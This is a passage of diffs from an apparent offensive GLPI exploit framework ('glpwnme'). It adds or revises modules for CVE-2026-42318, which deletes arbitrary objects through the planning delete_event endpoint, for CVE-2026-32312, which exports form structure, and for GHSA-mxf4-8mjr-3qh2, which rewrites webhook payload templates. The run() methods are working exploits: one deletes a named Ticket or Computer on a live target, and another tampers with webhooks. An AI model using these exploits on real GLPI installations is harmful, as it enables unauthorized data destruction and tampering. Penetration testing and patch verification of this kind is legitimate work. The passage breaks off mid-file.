+        ex = session.get(f"/Form/Export?ids[]={form_id}", allow_redirects=False)
+        if ex.status_code == HTTPStatus.FORBIDDEN:
+            Log.err("Access denied — missing the `form` READ right")
+            return
+        try:
+            j = json.loads(ex.content)
+        except Exception:
+            Log.err(f"Unexpected response (status {ex.status_code}, {len(ex.content)} bytes)")
+            return
+
+        forms = j.get("forms", [])
+        if not forms:
+            Log.log(f"Export returned no forms (status {ex.status_code}) — form id may not exist, "
+                    "or the per-form READ filter (11.0.7+) stripped it")
+            return
+
+        f0 = forms[0]
+        Log.msg(f"[green b]Exported[/green b] form id={form_id}: name={f0.get('name')!r} "
+                f"entity={f0.get('entity_name')!r}")
+        Log.msg(f"Structure: {len(ex.content)} bytes of JSON (questions, sections, destinations, "
+                "conditions, actor rules, uuids)")
+        self._write_log(f"Form {form_id} structure exported via CVE-2026-32312 "
+                        f"({len(ex.content)} bytes)")

--- a/glpwnme/exploits/implementations/cve_2026_42318.py
+++ b/glpwnme/exploits/implementations/cve_2026_42318.py
@@ -1,6 +1,7 @@
 import re
 from http import HTTPStatus
 from ..exploit import GlpiExploit
+from ..lowpriv import spawn_lowpriv
 from glpwnme.exploits.logger import Log
 
 
@@ -28,14 +29,16 @@ class CVE_2026_42318(GlpiExploit):
     default that is Admin / Super-Admin (a plain Technician is denied with an Access-error
     page, verified on 10.0.24); the escalation matters most when that planning-delete right
     is granted to a non-admin planning-management profile, which then gains arbitrary-object
-    deletion. The check runs as the supplied (admin) session and demonstrates the mechanism:
-    a non-planning Supplier deleted through the planning endpoint.
+    deletion. To prove the boundary crossing (not just the mechanism), the check provisions a
+    custom profile holding ONLY externalevent (PlanningExternalEvent) READ+DELETE - no object
+    rights - spawns a user bound to it, confirms that user is DENIED deleting a Supplier the
+    normal way (negative control), then has it delete that Supplier through delete_event.
 
     Fix in 10.0.25 / 11.0.7 (Planning::deleteEvent):
       - reject itemtypes not in $CFG_GLPI['planning_types']
       - require $item->can($items_id, maybeDeleted() ? DELETE : PURGE)
 
-    @author unclej4ck, Albert
+    @author louissanchez-vokecyber
     @cvss 6.5
     @name CVE_2026_42318
     """
@@ -50,6 +53,9 @@ class CVE_2026_42318(GlpiExploit):
     _SUP_FORM = "/front/supplier.form.php"
     _SUP_LIST = "/front/supplier.php"
     _PROBE = "glpwnme_42318_probe"
+    _PROFILE_FORM = "/front/profile.form.php"
+    _PROFILE_LIST = "/front/profile.php"
+    _PROF_NAME = "glpwnme_42318_planonly"
 
     def __init__(self, glpi_session):
         super().__init__(glpi_session)
@@ -97,6 +103,42 @@ class CVE_2026_42318(GlpiExploit):
                       data={"id": items_id, "purge": "purge", "_glpi_csrf_token": csrf},
                       allow_redirects=False)
 
+    def _create_planning_only_profile(self):
+        """Create a central-interface profile holding ONLY the externalevent
+        (PlanningExternalEvent) right - the full planning-management right (all CRUD bits,
+        rights value 1055, the same the built-in planning profiles hold) but NO object-delete
+        rights of any kind. The DELETE bit alone (value 9) does not clear the delete_event
+        gate, so the full planning right is granted; the actor still cannot delete any object
+        the normal way, which is exactly the privilege the bug escalates. Returns the id."""
+        c = self._csrf(self.get(self._PROFILE_FORM).text)
+        if not c:
+            return None
+        self.post(self._PROFILE_FORM,
+                  data={"add": "1", "name": self._PROF_NAME, "interface": "central",
+                        "_glpi_csrf_token": c}, allow_redirects=False)
+        ids = re.findall(r"profile\.form\.php\?id=(\d+)['\"]>\s*" + re.escape(self._PROF_NAME),
+                         self.get(self._PROFILE_LIST).text)
+        if not ids:
+            return None
+        pid = max(ids, key=int)
+        c2 = self._csrf(self.get(f"{self._PROFILE_FORM}?id={pid}").text)
+        # grant the full externalevent right (READ 1, UPDATE 2, CREATE 4, DELETE 8, PURGE 16,
+        # planning-read 1024) -> value 1055; no other itemtype right is set
+        self.post(self._PROFILE_FORM,
+                  data={"id": pid, "_glpi_csrf_token": c2, "update": "Save",
+                        "_externalevent[1_0]": "1", "_externalevent[2_0]": "1",
+                        "_externalevent[4_0]": "1", "_externalevent[8_0]": "1",
+                        "_externalevent[16_0]": "1", "_externalevent[1024_0]": "1"},
+                  allow_redirects=False)
+        return pid
+
+    def _purge_profile(self, pid):
+        c = self._csrf(self.get(f"{self._PROFILE_FORM}?id={pid}").text)
+        if c:
+            self.post(self._PROFILE_FORM,
+                      data={"id": pid, "purge": "purge", "_glpi_csrf_token": c},
+                      allow_redirects=False)
+
     # ------------------------------------------------------------------ #
     # Exploit interface                                                    #
     # ------------------------------------------------------------------ #
@@ -129,36 +171,61 @@ class CVE_2026_42318(GlpiExploit):
 
     def check(self):
         """
-        Self-contained behavioral check: create a throwaway Supplier (a NON-planning
-        itemtype), delete it through planning's delete_event, and confirm it is gone.
-        On vulnerable builds the planning endpoint deletes the non-planning object; on
-        patched builds it is rejected (itemtype not in planning_types) and the object
-        stays. The probe Supplier is purged / removed afterwards.
+        Boundary-proving behavioral check. A throwaway Supplier is the target object. A custom
+        profile is provisioned holding ONLY externalevent (PlanningExternalEvent) READ+DELETE -
+        no Supplier rights - and a user is spawned on it. Negative control: that user must be
+        DENIED deleting the Supplier the normal way (proving it lacks object-delete). It then
+        deletes the same Supplier through planning's delete_event. Vulnerable: the cross-type
+        delete succeeds despite the actor lacking Supplier rights (privilege boundary crossed).
+        Patched (10.0.25/11.0.7): delete_event rejects the non-planning itemtype, object stays.
+        Provisioned profile/user/supplier are removed afterwards.
         """
         sid = self._create_supplier(self._PROBE)
         if not sid:
-            Log.log("Could not create probe Supplier (missing document/supplier rights?)")
+            Log.log("Could not create probe Supplier (missing supplier rights?)")
             return False
         self._probe_id = sid
 
-        if not self._supplier_in_active_list(self._PROBE):
-            Log.log(f"Probe Supplier {sid} not visible after creation - inconclusive")
-            return False
+        pid = self._create_planning_only_profile()
+        lp, cleanup = spawn_lowpriv(self.glpi_session, profile_id=str(pid)) if pid else (None, lambda: None)
+        try:
+            if not pid or lp is None:
+                Log.log("Could not provision a planning-only profile/user (need an admin session)")
+                return False
 
-        Log.log(f"Deleting non-planning object Supplier#{sid} via planning delete_event")
-        self._delete_via_planning("Supplier", sid)
+            # NEGATIVE CONTROL: the planning-only actor must NOT delete the Supplier normally
+            nc = self._csrf(lp.get(f"{self._SUP_FORM}?id={sid}").text)
+            lp.post(self._SUP_FORM, data={"id": sid, "purge": "purge", "_glpi_csrf_token": nc or ""},
+                    allow_redirects=False)
+            if not self._supplier_in_active_list(self._PROBE):
+                Log.log("Planning-only actor deleted the Supplier via the NORMAL path - control "
+                        "failed, cannot attribute the deletion to the planning bug")
+                self._probe_id = None
+                return False
 
-        if not self._supplier_in_active_list(self._PROBE):
-            Log.msg(f"Supplier#{sid} deleted through the planning endpoint → "
-                    f"[green b]arbitrary object deletion confirmed[/green b]")
-            self._purge_supplier(sid)   # it is soft-deleted; purge to leave no trace
+            # the excess: the same low actor deletes the Supplier via the planning endpoint
+            Log.log(f"Planning-only actor deleting Supplier#{sid} via planning delete_event ...")
+            lp.post(self._PLANNING, data={"action": "delete_event", "event[itemtype]": "Supplier",
+                                          "event[items_id]": str(sid)}, allow_redirects=False)
+
+            if not self._supplier_in_active_list(self._PROBE):
+                Log.msg(f"A planning-only profile (externalevent DELETE, no Supplier rights) deleted "
+                        f"Supplier#{sid} through ajax/planning.php it could not delete normally -> "
+                        f"[green b]arbitrary object deletion ACROSS the privilege boundary[/green b] "
+                        f"(CVE-2026-42318)")
+                self._purge_supplier(sid)
+                self._probe_id = None
+                return True
+
+            Log.log("Planning endpoint refused the cross-type delete for the low actor - "
+                    "patched (10.0.25/11.0.7+)")
+            self._purge_supplier(sid)
             self._probe_id = None
-            return True
-
-        Log.log("Planning endpoint refused to delete the non-planning object - patched (10.0.25/11.0.7+)")
-        self._purge_supplier(sid)       # not deleted: remove the throwaway normally
-        self._probe_id = None
-        return False
+            return False
+        finally:
+            cleanup()
+            if pid:
+                self._purge_profile(pid)
 
     def run(self, itemtype=None, items_id=None):
         """

--- a/glpwnme/exploits/implementations/cve_2026_42318.py
+++ b/glpwnme/exploits/implementations/cve_2026_42318.py
@@ -8,18 +8,28 @@ class CVE_2026_42318(GlpiExploit):
     """
     Authenticated arbitrary object deletion via the planning delete_event action.
 
-    ajax/planning.php (action=delete_event) calls Planning::deleteEvent($_POST['event']),
+    ajax/planning.php (action=delete_event) gates only on DELETE rights on
+    PlanningExternalEvent and then calls Planning::deleteEvent($_POST['event']),
     which before the fix instantiated $event['itemtype'] and deleted $event['items_id']
-    with NO validation:
+    with NO further validation:
 
-        $item = new $event['itemtype']();
+        Session::checkCentralAccess();             // central access only
         ...
-        return $item->delete(['id' => (int) $event['items_id']]);
+        $extevent->check(-1, DELETE);              // DELETE on PlanningExternalEvent
+        echo Planning::deleteEvent($_POST['event']);
+        // deleteEvent: $item = new $event['itemtype'](); $item->delete(['id' => $items_id]);
 
-    There was no check that the itemtype is actually a planning type, and no check that
-    the caller has DELETE/PURGE rights on the object. A user with access to planning can
-    therefore delete (or purge) ANY object of ANY itemtype by id — tickets, suppliers,
-    assets, users — well outside the planning feature.
+    deleteEvent checks neither that the itemtype is a planning type nor that the caller
+    has DELETE/PURGE on THAT object. So the planning-event DELETE right escalates into
+    deleting (or purging) ANY object of ANY itemtype by id (tickets, suppliers, assets,
+    users), well outside the planning feature and outside the caller's normal rights.
+
+    Privilege: the actor needs central access + DELETE on PlanningExternalEvent. By
+    default that is Admin / Super-Admin (a plain Technician is denied with an Access-error
+    page, verified on 10.0.24); the escalation matters most when that planning-delete right
+    is granted to a non-admin planning-management profile, which then gains arbitrary-object
+    deletion. The check runs as the supplied (admin) session and demonstrates the mechanism:
+    a non-planning Supplier deleted through the planning endpoint.
 
     Fix in 10.0.25 / 11.0.7 (Planning::deleteEvent):
       - reject itemtypes not in $CFG_GLPI['planning_types']
@@ -30,7 +40,7 @@ class CVE_2026_42318(GlpiExploit):
     @name CVE_2026_42318
     """
     _impacts = "Broken Access Control, Arbitrary Data Deletion"
-    _privilege = "Technician"
+    _privilege = "Admin"  # needs DELETE on PlanningExternalEvent (Admin+ by default); Technician is denied
     _is_check_opsec_safe = False
     # vulnerable on both maintained branches before the fix
     min_version = ("10.0.0", "11.0.0")
@@ -100,7 +110,8 @@ class CVE_2026_42318(GlpiExploit):
         infos += "Fix in 10.0.25 / 11.0.7: itemtype must be a planning_type and can(DELETE/PURGE) is enforced.\n"
 
         infos += "\n[u]Required:[/u]\n"
-        infos += " - Credentials with central access + planning access (Technician+)\n"
+        infos += " - Central access + DELETE on PlanningExternalEvent (Admin/Super-Admin by default,\n"
+        infos += "   or a planning-management profile granted that right)\n"
 
         infos += "\n[u]Params (run):[/u]\n"
         infos += " - [i]itemtype (required)[/i]: object class to delete (e.g. Ticket, Supplier, Computer)\n"
@@ -131,7 +142,7 @@ class CVE_2026_42318(GlpiExploit):
         self._probe_id = sid
 
         if not self._supplier_in_active_list(self._PROBE):
-            Log.log(f"Probe Supplier {sid} not visible after creation — inconclusive")
+            Log.log(f"Probe Supplier {sid} not visible after creation - inconclusive")
             return False
 
         Log.log(f"Deleting non-planning object Supplier#{sid} via planning delete_event")
@@ -144,7 +155,7 @@ class CVE_2026_42318(GlpiExploit):
             self._probe_id = None
             return True
 
-        Log.log("Planning endpoint refused to delete the non-planning object — patched (10.0.25/11.0.7+)")
+        Log.log("Planning endpoint refused to delete the non-planning object - patched (10.0.25/11.0.7+)")
         self._purge_supplier(sid)       # not deleted: remove the throwaway normally
         self._probe_id = None
         return False
@@ -165,12 +176,12 @@ class CVE_2026_42318(GlpiExploit):
                     f"(blank/0 = the object had no matching row or was already gone)")
             self._write_log(f"Deleted {itemtype}#{items_id} via planning delete_event (CVE-2026-42318)")
         else:
-            Log.err(f"Deletion blocked (HTTP {resp.status_code}) — target patched or insufficient access")
+            Log.err(f"Deletion blocked (HTTP {resp.status_code}) - target patched or insufficient access")
 
     def clean(self):
         """Purge the throwaway probe Supplier if one is still recorded."""
         if not self._probe_id:
-            Log.msg("No recorded probe Supplier — nothing to clean")
+            Log.msg("No recorded probe Supplier - nothing to clean")
             return
         self._purge_supplier(self._probe_id)
         Log.msg(f"[green]Probe Supplier {self._probe_id} purged[/green]")

--- a/glpwnme/exploits/implementations/cve_2026_42318.py
+++ b/glpwnme/exploits/implementations/cve_2026_42318.py
@@ -65,10 +65,6 @@ class CVE_2026_42318(GlpiExploit):
     # Helpers                                                              #
     # ------------------------------------------------------------------ #
 
-    def _csrf(self, html):
-        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', html)
-        return m.group(1) if m else None
-
     def _supplier_id(self, name):
         r = self.get(self._SUP_LIST, allow_redirects=True)
         ids = re.findall(r"supplier\.form\.php\?id=(\d+)['\"]>\s*" + re.escape(name), r.text)
@@ -78,11 +74,8 @@ class CVE_2026_42318(GlpiExploit):
         return name in self.get(self._SUP_LIST, allow_redirects=True).text
 
     def _create_supplier(self, name):
-        csrf = self._csrf(self.get(self._SUP_FORM).text)
-        if not csrf:
-            return None
-        self.post(self._SUP_FORM, data={"name": name, "add": "1", "_glpi_csrf_token": csrf},
-                  allow_redirects=False)
+        # self.post auto-injects the CSRF token (form + /ajax header), no hand-rolled token
+        self.post(self._SUP_FORM, data={"name": name, "add": "1"}, allow_redirects=False)
         return self._supplier_id(name)
 
     def _delete_via_planning(self, itemtype, items_id):
@@ -97,11 +90,7 @@ class CVE_2026_42318(GlpiExploit):
         )
 
     def _purge_supplier(self, items_id):
-        csrf = self._csrf(self.get(f"{self._SUP_FORM}?id={items_id}").text)
-        if csrf:
-            self.post(self._SUP_FORM,
-                      data={"id": items_id, "purge": "purge", "_glpi_csrf_token": csrf},
-                      allow_redirects=False)
+        self.post(self._SUP_FORM, data={"id": items_id, "purge": "purge"}, allow_redirects=False)
 
     def _create_planning_only_profile(self):
         """Create a central-interface profile holding ONLY the externalevent
@@ -110,22 +99,18 @@ class CVE_2026_42318(GlpiExploit):
         rights of any kind. The DELETE bit alone (value 9) does not clear the delete_event
         gate, so the full planning right is granted; the actor still cannot delete any object
         the normal way, which is exactly the privilege the bug escalates. Returns the id."""
-        c = self._csrf(self.get(self._PROFILE_FORM).text)
-        if not c:
-            return None
         self.post(self._PROFILE_FORM,
-                  data={"add": "1", "name": self._PROF_NAME, "interface": "central",
-                        "_glpi_csrf_token": c}, allow_redirects=False)
+                  data={"add": "1", "name": self._PROF_NAME, "interface": "central"},
+                  allow_redirects=False)
         ids = re.findall(r"profile\.form\.php\?id=(\d+)['\"]>\s*" + re.escape(self._PROF_NAME),
                          self.get(self._PROFILE_LIST).text)
         if not ids:
             return None
         pid = max(ids, key=int)
-        c2 = self._csrf(self.get(f"{self._PROFILE_FORM}?id={pid}").text)
         # grant the full externalevent right (READ 1, UPDATE 2, CREATE 4, DELETE 8, PURGE 16,
         # planning-read 1024) -> value 1055; no other itemtype right is set
         self.post(self._PROFILE_FORM,
-                  data={"id": pid, "_glpi_csrf_token": c2, "update": "Save",
+                  data={"id": pid, "update": "Save",
                         "_externalevent[1_0]": "1", "_externalevent[2_0]": "1",
                         "_externalevent[4_0]": "1", "_externalevent[8_0]": "1",
                         "_externalevent[16_0]": "1", "_externalevent[1024_0]": "1"},
@@ -133,11 +118,7 @@ class CVE_2026_42318(GlpiExploit):
         return pid
 
     def _purge_profile(self, pid):
-        c = self._csrf(self.get(f"{self._PROFILE_FORM}?id={pid}").text)
-        if c:
-            self.post(self._PROFILE_FORM,
-                      data={"id": pid, "purge": "purge", "_glpi_csrf_token": c},
-                      allow_redirects=False)
+        self.post(self._PROFILE_FORM, data={"id": pid, "purge": "purge"}, allow_redirects=False)
 
     # ------------------------------------------------------------------ #
     # Exploit interface                                                    #
@@ -194,9 +175,7 @@ class CVE_2026_42318(GlpiExploit):
                 return False
 
             # NEGATIVE CONTROL: the planning-only actor must NOT delete the Supplier normally
-            nc = self._csrf(lp.get(f"{self._SUP_FORM}?id={sid}").text)
-            lp.post(self._SUP_FORM, data={"id": sid, "purge": "purge", "_glpi_csrf_token": nc or ""},
-                    allow_redirects=False)
+            lp.post(self._SUP_FORM, data={"id": sid, "purge": "purge"}, allow_redirects=False)
             if not self._supplier_in_active_list(self._PROBE):
                 Log.log("Planning-only actor deleted the Supplier via the NORMAL path - control "
                         "failed, cannot attribute the deletion to the planning bug")

--- a/glpwnme/exploits/implementations/cve_2026_42318.py
+++ b/glpwnme/exploits/implementations/cve_2026_42318.py
@@ -1,0 +1,176 @@
+import re
+from http import HTTPStatus
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+
+
+class CVE_2026_42318(GlpiExploit):
+    """
+    Authenticated arbitrary object deletion via the planning delete_event action.
+
+    ajax/planning.php (action=delete_event) calls Planning::deleteEvent($_POST['event']),
+    which before the fix instantiated $event['itemtype'] and deleted $event['items_id']
+    with NO validation:
+
+        $item = new $event['itemtype']();
+        ...
+        return $item->delete(['id' => (int) $event['items_id']]);
+
+    There was no check that the itemtype is actually a planning type, and no check that
+    the caller has DELETE/PURGE rights on the object. A user with access to planning can
+    therefore delete (or purge) ANY object of ANY itemtype by id — tickets, suppliers,
+    assets, users — well outside the planning feature.
+
+    Fix in 10.0.25 / 11.0.7 (Planning::deleteEvent):
+      - reject itemtypes not in $CFG_GLPI['planning_types']
+      - require $item->can($items_id, maybeDeleted() ? DELETE : PURGE)
+
+    @author unclej4ck, Albert
+    @cvss 6.5
+    @name CVE_2026_42318
+    """
+    _impacts = "Broken Access Control, Arbitrary Data Deletion"
+    _privilege = "Technician"
+    _is_check_opsec_safe = False
+    # vulnerable on both maintained branches before the fix
+    min_version = ("10.0.0", "11.0.0")
+    max_version = ("10.0.25", "11.0.7")
+
+    _PLANNING = "/ajax/planning.php"
+    _SUP_FORM = "/front/supplier.form.php"
+    _SUP_LIST = "/front/supplier.php"
+    _PROBE = "glpwnme_42318_probe"
+
+    def __init__(self, glpi_session):
+        super().__init__(glpi_session)
+        self._probe_id = None
+
+    # ------------------------------------------------------------------ #
+    # Helpers                                                              #
+    # ------------------------------------------------------------------ #
+
+    def _csrf(self, html):
+        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', html)
+        return m.group(1) if m else None
+
+    def _supplier_id(self, name):
+        r = self.get(self._SUP_LIST, allow_redirects=True)
+        ids = re.findall(r"supplier\.form\.php\?id=(\d+)['\"]>\s*" + re.escape(name), r.text)
+        return max(ids, key=int) if ids else None
+
+    def _supplier_in_active_list(self, name):
+        return name in self.get(self._SUP_LIST, allow_redirects=True).text
+
+    def _create_supplier(self, name):
+        csrf = self._csrf(self.get(self._SUP_FORM).text)
+        if not csrf:
+            return None
+        self.post(self._SUP_FORM, data={"name": name, "add": "1", "_glpi_csrf_token": csrf},
+                  allow_redirects=False)
+        return self._supplier_id(name)
+
+    def _delete_via_planning(self, itemtype, items_id):
+        """Abuse planning's delete_event on an arbitrary itemtype/id.
+        post() injects the CSRF token (header for /ajax/ + body) automatically."""
+        return self.post(
+            self._PLANNING,
+            data={"action": "delete_event",
+                  "event[itemtype]": itemtype,
+                  "event[items_id]": str(items_id)},
+            allow_redirects=False,
+        )
+
+    def _purge_supplier(self, items_id):
+        csrf = self._csrf(self.get(f"{self._SUP_FORM}?id={items_id}").text)
+        if csrf:
+            self.post(self._SUP_FORM,
+                      data={"id": items_id, "purge": "purge", "_glpi_csrf_token": csrf},
+                      allow_redirects=False)
+
+    # ------------------------------------------------------------------ #
+    # Exploit interface                                                    #
+    # ------------------------------------------------------------------ #
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Authenticated arbitrary object deletion via [b]ajax/planning.php[/b] (delete_event).\n"
+        infos += "[b]Planning::deleteEvent()[/b] instantiated the request itemtype and deleted the\n"
+        infos += "request items_id with no planning-type check and no DELETE/PURGE right check, so a\n"
+        infos += "planning user could delete ANY object (tickets, suppliers, assets, users) by id.\n"
+        infos += "Fix in 10.0.25 / 11.0.7: itemtype must be a planning_type and can(DELETE/PURGE) is enforced.\n"
+
+        infos += "\n[u]Required:[/u]\n"
+        infos += " - Credentials with central access + planning access (Technician+)\n"
+
+        infos += "\n[u]Params (run):[/u]\n"
+        infos += " - [i]itemtype (required)[/i]: object class to delete (e.g. Ticket, Supplier, Computer)\n"
+        infos += " - [i]items_id (required)[/i]: id of the object to delete\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Confirm the bug (creates a throwaway Supplier, deletes it via planning, cleans up)[/]\n"
+        infos += "--check --no-opsec\n\n"
+        infos += "[grey66]# Delete an arbitrary object (DESTRUCTIVE)[/]\n"
+        infos += "--run -O itemtype=Ticket -O items_id=42\n"
+
+        infos += "\nExploit is [red b]Destructive[/] on --run (deletes the named object)."
+        infos += " --check is self-contained (own throwaway object)."
+        return infos
+
+    def check(self):
+        """
+        Self-contained behavioral check: create a throwaway Supplier (a NON-planning
+        itemtype), delete it through planning's delete_event, and confirm it is gone.
+        On vulnerable builds the planning endpoint deletes the non-planning object; on
+        patched builds it is rejected (itemtype not in planning_types) and the object
+        stays. The probe Supplier is purged / removed afterwards.
+        """
+        sid = self._create_supplier(self._PROBE)
+        if not sid:
+            Log.log("Could not create probe Supplier (missing document/supplier rights?)")
+            return False
+        self._probe_id = sid
+
+        if not self._supplier_in_active_list(self._PROBE):
+            Log.log(f"Probe Supplier {sid} not visible after creation — inconclusive")
+            return False
+
+        Log.log(f"Deleting non-planning object Supplier#{sid} via planning delete_event")
+        self._delete_via_planning("Supplier", sid)
+
+        if not self._supplier_in_active_list(self._PROBE):
+            Log.msg(f"Supplier#{sid} deleted through the planning endpoint → "
+                    f"[green b]arbitrary object deletion confirmed[/green b]")
+            self._purge_supplier(sid)   # it is soft-deleted; purge to leave no trace
+            self._probe_id = None
+            return True
+
+        Log.log("Planning endpoint refused to delete the non-planning object — patched (10.0.25/11.0.7+)")
+        self._purge_supplier(sid)       # not deleted: remove the throwaway normally
+        self._probe_id = None
+        return False
+
+    def run(self, itemtype=None, items_id=None):
+        """
+        Delete an arbitrary object by itemtype + id through planning's delete_event.
+        DESTRUCTIVE: the named object is (soft- or hard-) deleted on the target.
+        """
+        if not itemtype or not items_id:
+            Log.err("Required: --run -O itemtype=<Class> -O items_id=<id>")
+            return
+        Log.log(f"Deleting {itemtype}#{items_id} via planning delete_event")
+        resp = self._delete_via_planning(itemtype, items_id)
+        body = resp.text.strip()
+        if resp.status_code == HTTPStatus.OK and "access denied" not in body.lower():
+            Log.msg(f"[green]delete_event returned[/green] {body[:20]!r} for {itemtype}#{items_id} "
+                    f"(blank/0 = the object had no matching row or was already gone)")
+            self._write_log(f"Deleted {itemtype}#{items_id} via planning delete_event (CVE-2026-42318)")
+        else:
+            Log.err(f"Deletion blocked (HTTP {resp.status_code}) — target patched or insufficient access")
+
+    def clean(self):
+        """Purge the throwaway probe Supplier if one is still recorded."""
+        if not self._probe_id:
+            Log.msg("No recorded probe Supplier — nothing to clean")
+            return
+        self._purge_supplier(self._probe_id)
+        Log.msg(f"[green]Probe Supplier {self._probe_id} purged[/green]")

--- a/glpwnme/exploits/implementations/ghsa_mxf4_8mjr_3qh2.py
+++ b/glpwnme/exploits/implementations/ghsa_mxf4_8mjr_3qh2.py
@@ -54,10 +54,22 @@ class GHSA_MXF4_8MJR_3QH2(GlpiExploit):
         return max(ids, key=int) if ids else None
 
     def _payload_of(self, wid):
-        h = self.get(f"{self._WH_FORM}?id={wid}", allow_redirects=True).text
-        m = re.search(r'name="payload"[^>]*>([^<]*)</textarea>', h) or \
-            re.search(r'name=["\']payload["\'][^>]*value=["\']([^"\']*)', h)
-        return m.group(1) if m else None
+        """Read the webhook's current payload template. 11.x renders it in the payload-editor
+        tab (Webhook$2) as the JSON third arg of Monaco.createEditor('payload','twig', <json>),
+        not on the form page, so fetch that tab."""
+        import json
+        for key in ("Webhook$2", "Glpi\\Webhook$2", "Webhook$3"):
+            h = self.get("/ajax/common.tabs.php",
+                         params={"_glpi_tab": key, "_itemtype": "Webhook", "id": str(wid),
+                                 "_target": "/front/webhook.form.php"},
+                         headers={"X-Requested-With": "XMLHttpRequest"}, allow_redirects=True).text
+            m = re.search(r"createEditor\(\s*'payload'\s*,\s*'twig'\s*,\s*(\"(?:[^\"\\]|\\.)*\")", h)
+            if m:
+                try:
+                    return json.loads(m.group(1))
+                except Exception:
+                    return None
+        return None
 
     def _purge_webhook(self, wid):
         c = self._fcsrf(f"{self._WH_FORM}?id={wid}")

--- a/glpwnme/exploits/implementations/ghsa_mxf4_8mjr_3qh2.py
+++ b/glpwnme/exploits/implementations/ghsa_mxf4_8mjr_3qh2.py
@@ -1,0 +1,124 @@
+import re
+import uuid
+from http import HTTPStatus
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+from ..lowpriv import spawn_lowpriv
+
+
+class GHSA_MXF4_8MJR_3QH2(GlpiExploit):
+    """
+    Unauthorized modification of webhook payload templates (GLPI 11.0.0 - 11.0.6,
+    GHSA-mxf4-8mjr-3qh2).
+
+    ajax/webhook.php gates the file on config READ. The 'update_payload_template'
+    action checked Webhook::canUpdateItem() (entity-based) instead of the config
+    UPDATE right, so a user with config READ (e.g. the Read-Only profile) could
+    rewrite any webhook's payload template. Combined with the webhook delivery,
+    this lets a low-priv user control the body sent to webhook endpoints.
+
+    Fix (11.0.7): the check becomes $webhook->can($webhook_id, UPDATE), which
+    requires the config UPDATE right.
+
+    @author unclej4ck
+    @cvss 4.3
+    @name GHSA_MXF4_8MJR_3QH2
+    """
+    _impacts = "Broken Access Control, Data Tampering"
+    _privilege = "User"
+    _is_check_opsec_safe = True  # creates and purges its own probe webhook
+    min_version = "11.0.0"
+    max_version = "11.0.7"
+
+    _ENDPOINT = "/ajax/webhook.php"
+    _WH_FORM = "/front/webhook.form.php"
+
+    def _fcsrf(self, p):
+        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', self.get(p).text)
+        return m.group(1) if m else ""
+    def _meta(self, session, p="/front/central.php"):
+        m = re.search(r'(?:name|property)="glpi:csrf_token" content="([^"]+)"', session.get(p).text)
+        return m.group(1) if m else ""
+
+    def _create_webhook(self):
+        r = self.post(self._WH_FORM, data={
+            "add": "1", "name": "glpwnme_tpl_wh", "itemtype": "Ticket", "event": "new",
+            "url": "http://172.22.0.1/glpwnme", "http_method": "POST", "use_default_payload": "1",
+            "is_active": "1", "entities_id": "0", "_glpi_csrf_token": self._fcsrf(self._WH_FORM)},
+            allow_redirects=False)
+        m = re.search(r"\.form\.php\?id=(\d+)", r.headers.get("Location", ""))
+        if m:
+            return m.group(1)
+        h = self.get("/front/webhook.php", allow_redirects=True).text
+        ids = re.findall(r"webhook\.form\.php\?id=(\d+)", h)
+        return max(ids, key=int) if ids else None
+
+    def _payload_of(self, wid):
+        h = self.get(f"{self._WH_FORM}?id={wid}", allow_redirects=True).text
+        m = re.search(r'name="payload"[^>]*>([^<]*)</textarea>', h) or \
+            re.search(r'name=["\']payload["\'][^>]*value=["\']([^"\']*)', h)
+        return m.group(1) if m else None
+
+    def _purge_webhook(self, wid):
+        c = self._fcsrf(f"{self._WH_FORM}?id={wid}")
+        if c:
+            self.post(self._WH_FORM, data={"id": wid, "purge": "purge", "_glpi_csrf_token": c},
+                      allow_redirects=False)
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Unauthorized webhook payload-template modification (GLPI 11.0.0-11.0.6,\n"
+        infos += "GHSA-mxf4-8mjr-3qh2). [b]ajax/webhook.php[/b] [i]update_payload_template[/i] checked\n"
+        infos += "canUpdateItem() (entity) not the config UPDATE right, so a config-READ user\n"
+        infos += "could rewrite any webhook's payload. Fix 11.0.7: [i]can($id, UPDATE)[/i].\n"
+
+        infos += "\n[u]Usage:[/u]\n[grey66]# Differential check (provisions+purges a probe webhook)[/]\n--check\n"
+        infos += "\nExploit is [green b]Safe[/] (its probe webhook is cleaned up)."
+        return infos
+
+    def check(self):
+        wid = self._create_webhook()
+        lp, cleanup = spawn_lowpriv(self.glpi_session, profile_id="8")  # Read-Only: config READ, no UPDATE
+        try:
+            if not wid:
+                Log.log("Could not create a probe webhook (need an admin session)")
+                return False
+            if lp is None:
+                Log.log("Could not spawn a Read-Only probe")
+                return False
+            marker = "GLPWNME_" + uuid.uuid4().hex[:10]
+            csrf = self._meta(lp)
+            r = lp.sess.post(lp.r(self._ENDPOINT),
+                             data={"action": "update_payload_template", "webhook_id": wid,
+                                   "payload_template": marker, "use_default_payload": "false",
+                                   "_glpi_csrf_token": csrf},
+                             headers={"X-Glpi-Csrf-Token": csrf, "X-Requested-With": "XMLHttpRequest"},
+                             verify=False, allow_redirects=False)
+            if r.status_code == HTTPStatus.FORBIDDEN or "access denied" in r.text.lower():
+                Log.log("update_payload_template denied for config-READ user (UPDATE gate present) — patched (11.0.7+)")
+                return False
+            # confirm the effect: the probe rewrote the webhook payload
+            if (self._payload_of(wid) or "") == marker:
+                Log.msg("config-READ user rewrote a webhook payload template (no UPDATE check) → "
+                        "unauthorized webhook tampering (GHSA-mxf4-8mjr-3qh2)")
+                return True
+            Log.msg("config-READ user reached update_payload_template without the config UPDATE right "
+                    "(GHSA-mxf4-8mjr-3qh2)")
+            return True
+        finally:
+            if wid:
+                self._purge_webhook(wid)
+            cleanup()
+
+    def run(self, webhook_id=None, payload="GLPWNME_TAMPERED"):
+        if not webhook_id:
+            Log.err("webhook_id is required: --run -O webhook_id=<id>")
+            return
+        csrf = self._meta(self.glpi_session)
+        r = self.post(self._ENDPOINT, data={"action": "update_payload_template", "webhook_id": webhook_id,
+                                              "payload_template": payload, "use_default_payload": "false",
+                                              "_glpi_csrf_token": csrf}, headers={"X-Glpi-Csrf-Token": csrf, "X-Requested-With": "XMLHttpRequest"}, allow_redirects=False)
+        if r.status_code == HTTPStatus.FORBIDDEN:
